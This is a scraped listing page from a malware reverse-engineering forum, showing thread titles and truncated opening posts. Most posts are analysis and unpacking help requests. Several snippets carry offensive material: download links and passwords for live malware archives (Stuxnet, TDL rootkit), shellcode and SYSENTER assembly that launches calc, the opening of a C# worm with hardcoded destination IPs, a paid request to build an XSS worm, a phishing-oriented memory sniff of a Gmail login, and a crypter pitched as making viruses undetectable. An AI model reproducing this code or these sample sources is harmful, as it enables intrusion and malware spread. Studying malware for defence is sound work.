Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
360 topics in this forum
-
Live Malware Samples...
by Teddy Rogers - 1 follower - 18 replies - 26k views
Thought I would start a topic with a list of places to find malware samples. Feel free to post other sources if you have any... and remember live samples will be harmful to your computer, so if you don't know what you're doing and/or how to work with malware don't read any further for the sake of your own sanity... Malware Domain List: http://www.malwaredomainlist.com/mdl.php Malware Blacklist: http://www.malwareblacklist.com/showMDL.php Ted.
-
This is what I could find and rar up: 2 tmp files, 1 exe that is really a dll, 1 lnk file, 1 lnk file (suckme), 1 sys file, 1 dll file (suckme). vidnux.com, offensivecomputing, 4shared. It may still yet be incomplete.. so if it is.. lemme know.. there are 2 sys files yet I could only find 1... sites are listed that I found parts of this worm at... rar passwd: infected StuxNet.rar
-
Which Virtual Machine Software do you prefer?
by deepzero - 1 follower - 61 replies - 34.3k views
Hi, I have been using Microsoft VirtualPC for years now. Which Virtualization Software do you prefer?
-
90$ XSS Worm Project
by tibe87 - 4 replies - 30.8k views
Introduction This is a school project (educational purpose), so I don't care about hacking any website. It's a bit over my head so that's why I am posting this project. Basically I need to reproduce the ''Samy worm'' known also as "myspace worm" in a controlled environment. Requirements For starters I need a "mini" myspace/facebook to test the worm. To make it simpler, there are some free social networks available like Elgg, Oxwall that you can use. (I have an old version of Oxwall already vulnerable to basic XSS) Or you can make it vulnerable yourself by editing it. (I know for sure that this is possible) Or maybe it's easier for you to build it from scratch implementin…
-
EMV Softwares
by Xyl2k - 4 followers - 11 replies - 27k views
Someone on Telegram intrigued me by telling me about software to read credit card chips, so here are some files that I got from the net. The first software in question, which I came across: "EMVStudio" belonging to emvstudio.com. If I look for the files on VT, it communicates with auth.emvstudio.com; I come across these 3 archives: EMVStudio.rar - 1ba1fac55003d2c966f0071b2c126169254b35a38b4e2b913557c4fb0faadfdb Contains 8d6dacff8a098b8d02202e8c6a4a65bbe20b332ba58d6165cca6f958187864c4 also a file named 'gp' which seems to be a config file. emvstudio_v1.1.1.rar - 0bd11f024845c07e0df8fe2f080f4925dc44a289e4e59b079be0a68ed2fc42a6 Contains emvstudio_v1.1.2.exe - ce9187aa…
-
Shellcode+SYSENTER = CALC (SP3)
by JMC31337 - 58 replies - 23.6k views
#include <windows.h>
//DEV-C++
//link with -masm=intel
asm(".intel_syntax noprefix");
static long csx;
static char* test;
int main(void) {
    asm("pop ebp");
    asm("pop ebp");
    asm("pop ebp");
    //asm("push 0x11111111");
    //asm("push 0xEEEEEEEE");
    //asm("push 0xAAAAAAAA");
    //asm("push 0xCCCCCCCC");
    //char *test = "\x31\xC9\x51\x68"
    //"\x63\x61\x6C\x63"
    //"\x54\xB8\xC7\x93"
    //"\xC2\x77\xFF\xD0";
    asm("push 0xD0FF77C2");
    asm("push 0x93C7B854");
    asm("push 0x636C6163");
    asm("push 0x6851C931");
    asm("push 0x004012E6");
    asm("mov ebp,0x33333333");
    asm("mov edx, esp");
    asm("SYSENTER");
    asm("push 0");
    asm("call _ExitProcess@4");
    asm("call esp");
    return 0;
…
-
www.support.me
by Teddy Rogers - 6 replies - 23.3k views
Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…
-
(Help Request) .Net Protector Identification
by madskillz - 25 replies - 21.3k views
Hi, I tried DiE, PEiD, Protection ID, RDG, but cannot detect the protector. de4dot detected it as DeepSea, but deobfuscation was not done. File attached: FoxUserTools.zip. File can be malware, etc., please use VM, protection. Need packer identification and unpack help. Regards
-
- 10 replies - 19.1k views
Hello, I've a question. I've a DLL (yes, I know the source) which is confused using ConfuserEx 0.5 with .NET Framework 4.52. Now I've tried to open the DLL using several disassemblers but no result. I found several tutorials on how to unconfuse the DLL in this forum but all of them are not successful in this case. I've tried ConfuserExFixer, MethodsDecrypter, ... and so on. Could anyone tell me HOW it's possible and a decrypted result? Attached is the DLL. It's nothing special. Thanks. CGBfunctions.zip
-
TDL x64 Rootkit
by Aguila - 2 replies - 16.4k views
Called TDL, TDSS, Alureon or Olmarik. First widely spread x64 rootkit. Analysis: http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (German, but with TDL dropper source code) Download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected
-
- 8 replies - 16.2k views
Get the whole exploit code here: http://www.milw0rm.com/exploits/6031 I think this exploit is dangerous. Maybe some software will use it to avoid debugging? Or probably malware will use it. Keep your eyes open.
-
Reversing worm
by ~karthikeyanck~ - 2 replies - 16k views
Hi All, I'm not sure if these kinds of requests are welcomed. I am trying to reverse a worm and having trouble doing it. I found that the worm is packed using AutoIt. Please can somebody assist me in reversing it. Let me know if you need the source. I understood the behavior of the worm, but I am trying to dig deeper into the code to understand things better. Thanks for your assistance in advance. Note: I've already tried using an AutoIt decompiler with no luck. It doesn't identify the executable.
-
What is BaseThreadInitThunk?
by r42fr - 1 reply - 15.7k views
What is BaseThreadInitThunk? I don't find it on MSDN.
-
Malware VMProtect
by ONDragon - 5 replies - 14.9k views
When I reverse the MALWARE, I realise it was PROTECTED by VM, so I try to run it so that I catch its behavior. BUT there are some anti-VMware ways (I try to run it both in VMware and VirtualBox). The Questions: If I encounter the MALWARE, what should I do? PS: How to unpack the VM and how to hide the VMware of both VMware and VirtualBox!!! Please help ME. THANKS!!!
-
C# Nemesis.Worm
by JMC31337 - 1 reply - 14.8k views
//JMC31337
//NEMESIS WORM PROJEKT
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;
using System.Collections.Generic;
using System.IO;
using System.Text.RegularExpressions;
using System.Net.Mail;
using System.Net.Mime;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Collections;
using System.ComponentModel;
using System.Data;
using Microsoft.Win32;
namespace ConsoleApplication1 {
    class Program {
        public static int bypass = 0;
        private static string DESTINATION_IP_ADDRESS = "204.13.204.222";
        private static string DESTINATION_IP_ADDRESS2 = "2…
-
Chinese Spy App
by JMC31337 - 0 replies - 14.5k views
MobileHunter base.apk
-
fake crack sites
by Xyl2k - 2 followers - 10 replies - 14.5k views
So you want to download some releases from SnD? Alright, let's see at snd.webscene.ir, the distribution section menu contains a link pointing at hxtps://keygens.pro/ Super, looks like there are a lot of cracks over here! And the site is virus free, right? So let's pick something, I don't know, maybe 7-Data.Card.Recovery.1.1.keygen-SND hxtps://keygens.pro/crack/729775/ lol @ the description on the page, didn't know Reagan was from SnD and born in Russia. Anyway we got redirected to a download page after clicking the 'Download only Keygen' button, we have to fill a captcha and agree to the conditions. The archive is password protected and contains only…
-
Collection of Anti-Malware Analysis Tricks.
by Noteworthy - 4 replies - 14.4k views
Hi SnD, This is a small tool I wrote while reversing some malware. It performs a bunch of today's malware tricks and the goal is to see if you stay under the radar. That could be useful if: You are making an anti-debug plugin and you want to check its effectiveness. You want to ensure that your sandbox solution is hidden enough. You want to write behavior rules to detect any attempt to use these tricks. Please, if you encounter any anti-analysis tricks which you have seen in a malware, don't hesitate to contribute. List of features supported: Anti-debugging attacks IsDebuggerPresent CheckRemoteDebuggerPresent …
-
Unpacking RunPe Malware
by Phasip - 11 replies - 13.6k views
Hello! I recently started doing some malware reversing and the second application I met is an app called ohhai.exe. As all packer identifiers I have run say that it is Visual Basic, I tried to open it with a program that views P-Code; looking through the code I found a function called RunPe. I found out this is a common way to hide viruses within VB code. The problem is that there does not seem to be much information on how to unpack these. I found two http://www.opensc.ws/tutorials-articles/11144-tutorial-unpacking-runpe.html http://interestingmalware.blogspot.com/2010/07/unpacking-vbinjectvbcryptrunpe.html which both have easy steps but I don't seem to be able t…
-
write a sandbox
by rever_ser - 2 replies - 13.4k views
Hi, I want to write a sandbox. I want to know exactly what parts make up a sandbox and how it works anyhow. Can anyone recommend a resource in this regard?
-
Tracking Gimmiv...
by Teddy Rogers - 0 replies - 12.7k views
Research_Blog___Research___SecureWorks.pdf http://www.secureworks.com/research/blog/i...racking-gimmiv/ Ted.
-
Memory Sniffing
by JMC31337 - 4 replies - 12.3k views
Working on doing a little phishing expedition (yeah, it's for the birds but I gotta write a good one in C# before I move on). Grabbed CheatEngine to scan through some memory (Cheat Engine is not bad, but I don't like the crap it tries to install with it - GOT A BETTER ONE? LEMME KNOW-). Using Chrome to log in to GMAIL I put a fake password as 16 A's: GALX=p_COcLCigQk&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&rm=false&ltmpl=default&hl=en&scc=1&ss=1&_utf8=%E2%98%83&bgresponse=%21A0I0ITH9HDNvS0R6sejAokAPWwIAAADsUgAAAA0qAQ54RhVt-Qu2LVKb4J23WkCZueD1ffB8V_ZSE_jIE04XOzOSUwm16rZ2suDsEJH9riKKR60AWqjQpirqHTN-qJ64hB7Rl61SZaj_8K…
-
W32.SafeSys.Worm
by Jaymz - 1 reply - 12.3k views
Used search on the entire forum and also this sub-section, but I didn't find anything related to the SafeSys virus... Here's a download link for it, if you want to examine it.. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected, so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deep Freeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…
-
Unknown Packer
by payam5959 - 1 follower - 4 replies - 12k views
I am trying to unpack 2 DLL files which I'm not sure what they do. They seem to memory patch some files. With DiE it is detected as VMProtect, but when I browse them with CFF Explorer, looking at different sections, I'm only seeing TORO0 and TORO1 with no vmp sections. I am not sure if it is VMP and so I have no clue how to unpack. Can someone provide me some information on which kind of packer I am confronted with? Also I can provide a sample DLL if someone can help. Regards, payam
-
Crypter overview
by cipher - 6 replies - 11.9k views
Hello, I am here today with the executable that can obfuscate the virus and make it fully undetectable by anti-viruses. This executable uses RunPE techniques to inject into another process and to dump the crypted code into memory, and hence the executable's code remains undetected by anti-viruses. These crypters are programmed by individuals and hence remain undetected most of the time. Mostly they are coded in VB or .NET and hence you will find most of the viruses showing VB attributes during PE scans, but mostly the viruses/RATs/Stealers/Bots/Worms are coded in Borland Delphi. Examples: 1) RATs: CyberGate, Blackshades, Pixel, SpyNet, DarkComet etc. 2) STEALERS …